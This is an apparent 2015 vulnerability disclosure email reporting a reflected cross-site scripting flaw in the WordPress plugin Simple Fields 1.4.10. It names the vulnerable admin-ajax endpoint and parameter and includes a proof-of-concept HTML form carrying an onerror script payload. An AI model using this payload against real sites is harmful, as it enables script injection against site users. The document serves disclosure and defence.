Subject: Cross-Site Scripting (XSS) in Simple Fields 1.4.10

Date: Tue, 25 Aug 2015 12:54:03 +0200

Hello,

Plugin: Simple Fields 1.4.10 https://wordpress.org/plugins/simple-fields/

1. Reflected Cross-Site Scripting (XSS)

Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection!).

Method: POST

Url: http://localhost/wp-admin/admin-ajax.php?action=simple_fields_field_type_post_dialog_load

Vulnerable parameters: arr_enabled_post_types

Example PHP callstack:

simple_fields::field_type_post_dialog_load [/simple-fields/simple_fields.php:2645]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=simple_fields_field_type_post_dialog_load" />

<input type="text" name="arr_enabled_post_types[0]" value='"><img src=x onerror=alert(1) />' />

<input type="submit" name="submit" />

</form>

--

--

Regards,
Marcin Probola,